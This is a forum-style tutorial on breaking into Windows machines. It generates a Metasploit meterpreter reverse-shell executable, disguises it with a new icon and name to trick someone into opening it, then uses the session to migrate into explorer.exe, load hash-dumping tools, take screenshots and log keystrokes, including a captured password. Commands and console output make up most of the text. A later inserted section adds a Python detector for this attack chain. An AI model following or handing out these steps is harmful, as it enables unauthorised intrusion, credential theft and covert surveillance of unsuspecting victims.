Hey, I'm going to show you step by step how to get into a Windows system easily. I used BackTrack 4 in this case, but you can also use Windows if you want to. What we are going to use is Metasploit and Nmap. Just follow the steps.
Download Metasploit from this site; you can use it on Windows or Linux.
Install the program.

If it is only a local network, use your local IP address; if it is over the internet, use your WAN IP address, which you can see from

Start a terminal/shell on BackTrack.

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 x > /root/Payload.exe
Created by msfpayload (
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=,LPORT=4444

If you made the payload right, the output will look like this; if it doesn't, you did it wrong. The Payload.exe file will be on your desktop.

I suggest, if you can, downloading Icon Changer 3.8 and changing the icon, and naming it something more interesting; then you can easily get somebody to open the file.
Download Icon Changer 3.8 here:

Start Metasploit, and choose your exploit and PAYLOAD. Do it as shown here.

root@bt:~# msfconsole

< metasploit >
  (__)    )
    ||--|| *

  =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 575 exploits - 290 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
  =[ svn r9959 updated 241 days ago (2010.08.05)

Warning: This copy of the Metasploit Framework was last updated 241 days ago.
  We recommend that you update the framework at least every other day.
  For information on updating your copy of Metasploit, please see:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) >

See which options you have.

msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

We are going to use our local IP address this time. Do that by opening a new terminal/shell.

root@bt:~# ifconfig
eth0  Link encap:Ethernet  HWaddr 00:0c:29:32:56:46
    inet addr:  Bcast:  Mask:
    inet6 addr: fe80::20c:29ff:fe32:5646/64 Scope:Link
    RX packets:43 errors:0 dropped:0 overruns:0 frame:0
    TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:5370 (5.3 KB)  TX bytes:1152 (1.1 KB)
    Interrupt:19 Base address:0x2000

Let's enter our IP and port. Back to Metasploit.

msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
LPORT => 4444

msf exploit(handler) > exploit

[*] Started reverse handler on 10.113.20

[*] Starting the payload handler...

Make someone open the Payload.exe. I recommend downloading Icon Changer 3.8, changing the Payload.exe icon and renaming it, and then you can send it to somebody. After they open the file, it will look like this.

[*] Started reverse handler on
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to
[*] Meterpreter session 1 opened ( -> at 2011-04-03 22:44:14 -0200

meterpreter >

We are going to migrate into explorer.exe now. Type ps to see the target's processes.

meterpreter > ps

Process list

PID   Name    Arch  Session  User  Path
---   ----    ----  --  ----  ----
0  [System Process]
4  System
356   smss.exe
444   csrss.exe
508   wininit.exe
520   csrss.exe
556   services.exe
572   lsass.exe
580   lsm.exe
704   svchost.exe
768   nvvsvc.exe
808   svchost.exe
868   svchost.exe
900   svchost.exe
928   svchost.exe
1068  svchost.exe
1144  DisplayLinkManager.exe
1176  winlogon.exe
1316  Smc.exe
1400  nvvsvc.exe
1476  svchost.exe
1548  ccSvcHst.exe
1708  spoolsv.exe
1720  DisplayLinkUserAgent.exe
1752  svchost.exe
1992  svchost.exe
2040  IPROSetMonitor.exe
464   LVPrcSrv.exe
408   mdm.exe
940   svchost.exe
1140  Rtvscan.exe
1448  TeamViewer_Service.exe
2068  UltiDevCassinWebServer2a.exe
2144  vmware-usbarbitrator.exe
2268  vmnat.exe
2324  vmnetdhcp.exe
2360  vmware-authd.exe
2848  svchost.exe
2916  svchost.exe
3460  taskhost.exe    x86   1  SERMERSOOQ\ilin  C:\Windows\system32\taskhost.exe
3528  dwm.exe  x86   1  SERMERSOOQ\ilin  C:\Windows\system32\Dwm.exe
3580  explorer.exe    x86   1  SERMERSOOQ\ilin  C:\Windows\Explorer.EXE
3740  DisplayLinkUI.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\DisplayLink Core Software\DisplayLinkUI.exe
4080  hqtray.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\VMware\VMware Player\hqtray.exe
2304  SmcGui.exe    x86   1
2084  AdobeARM.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
2336  ccApp.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Common Files\Symantec Shared\ccApp.exe
2000  LWS.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe
3832  PWRISOVM.EXE    x86   1  SERMERSOOQ\ilin  C:\Program Files\PowerISO\PWRISOVM.EXE
4004  PrintScreen.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe
1952  PRTG Windows GUI.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\PRTG Network Monitor\PRTG Windows GUI.exe
1936  CUCore.exe    x86   1  SERMERSOOQ\ilin  C:\Users\ilin\AppData\Local\Radvision\Conference Client\7.10.1.169\cucore.exe
2540  COCIManager.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Common Files\Logishrd\LQCVFX\COCIManager.exe
4784  SearchIndexer.exe
2964  msnmsgr.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Windows Live\Messenger\msnmsgr.exe
6028  wlcomm.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\Windows Live\Contacts\wlcomm.exe
5944  vmplayer.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\VMware\VMware Player\vmplayer.exe
5096  firefox.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Mozilla Firefox\firefox.exe
448   plugin-container.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\Mozilla Firefox\plugin-container.exe
4488  vmware-vmx.exe
5200  Payload.exe  x86   1  SERMERSOOQ\ilin  C:\Users\ilin\Desktop\Payload.exe
5696  notepad.exe  x86   1  SERMERSOOQ\ilin  C:\Windows\system32\notepad.exe

meterpreter > migrate 3580
[*] Migrating to 3580...
[*] Migration completed successfully.
meterpreter >

I typed use priv to open hashdump or other things. 

meterpreter > use priv
Loading extension priv...success.

Type sysinfo to see which system it is. Is it helpful?

meterpreter > sysinfo
Computer: NUUMOB0088
OS  : Windows 7 (Build 7600, ).
Arch    : x86
Language: da_DK
meterpreter >

Take a screenshot of the target's desktop. Remember, after you take the screenshot, the file is on your desktop.

meterpreter > screenshot
Screenshot saved to: /root/qgYuVeTx.jpeg
meterpreter > /usr/lib/firefox-3.0.15/firefox: symbol lookup error: /usr/lib/xulrunner- undefined symbol: sqlite3_enable_shared_cache

meterpreter >

You can capture and listen to whatever the target types, like this.

meterpreter > keyscan_dump
Dumping captured keystrokes...
<LWin> rnotepad <Return> my password it Hahahahaha <Alt>  <LMenu>  <Tab>
meterpreter >
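A detection-side counterpart to the chain above (Payload.exe run from the user's Desktop, the reverse connection to LPORT 4444, then migration into explorer.exe), added here as an example and not part of the original tutorial: a small Python checker that runs three rules over constructed Sysmon-style network-connection records. The record format, the sample paths and addresses, and the expected-port sets are assumptions made for this example.

```python
import re
from typing import List, Tuple

# Constructed Sysmon-style network-connection records (Event ID 3), one per
# line, reduced to the fields the rules below use. Not real telemetry.
SAMPLE_EVENTS = """\
Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe|User=LAB\\user1|Dest=203.0.113.10:443
Image=C:\\Users\\user1\\Desktop\\Payload.exe|User=LAB\\user1|Dest=198.51.100.7:4444
Image=C:\\Windows\\Explorer.EXE|User=LAB\\user1|Dest=198.51.100.7:4444
Image=C:\\Windows\\Explorer.EXE|User=LAB\\user1|Dest=203.0.113.10:443
"""
# Directories an ordinary user can write to: a process started from one of
# these that opens a network connection is what a dropped Payload.exe looks like.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(desktop|downloads|appdata\\local\\temp)\\", re.I)
# Metasploit's default LPORT for reverse_tcp; a hint only, any port can be used.
DEFAULT_MSF_PORT = 4444
# Ports explorer.exe is normally expected to reach (web content, SMB shares).
EXPLORER_EXPECTED_PORTS = {80, 443, 445}

def parse_event(line: str) -> dict:
    """Split one 'k=v|k=v' record into a dict; Dest becomes DestHost + int DestPort."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    host, port = fields["Dest"].rsplit(":", 1)
    fields["DestHost"], fields["DestPort"] = host, int(port)
    return fields

def check_event(ev: dict) -> List[str]:
    """Return the names of the rules this record trips (empty list if clean)."""
    hits = []
    image = ev["Image"]
    exe = image.rsplit("\\", 1)[-1].lower()
    if USER_WRITABLE.match(image):
        hits.append("exec-from-user-writable-dir")
    # After 'migrate <pid of explorer.exe>' the reverse shell's socket belongs
    # to explorer.exe, so an unexpected outbound port from it is the signal.
    if exe == "explorer.exe" and ev["DestPort"] not in EXPLORER_EXPECTED_PORTS:
        hits.append("explorer-unusual-outbound-port")
    if ev["DestPort"] == DEFAULT_MSF_PORT:
        hits.append("metasploit-default-port")
    return hits

def scan(events: str) -> List[Tuple[str, int, List[str]]]:
    """Run every non-empty record through the rules; keep those with a hit."""
    results = []
    for ev in (parse_event(l) for l in events.splitlines() if l.strip()):
        hits = check_event(ev)
        if hits:
            results.append((ev["Image"], ev["DestPort"], hits))
    return results
```

On the sample records, the Firefox connection and explorer.exe on 443 pass clean, while Payload.exe and the post-migration explorer.exe connection are each flagged twice.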
I have another thread if you don't want to wait for the host; there you can just type the target's IP and port. My tutorial's link is here.

Enjoy it!
Rate this and make comments.

Is it too difficult to understand? If it is, I think I can make it more understandable ;D
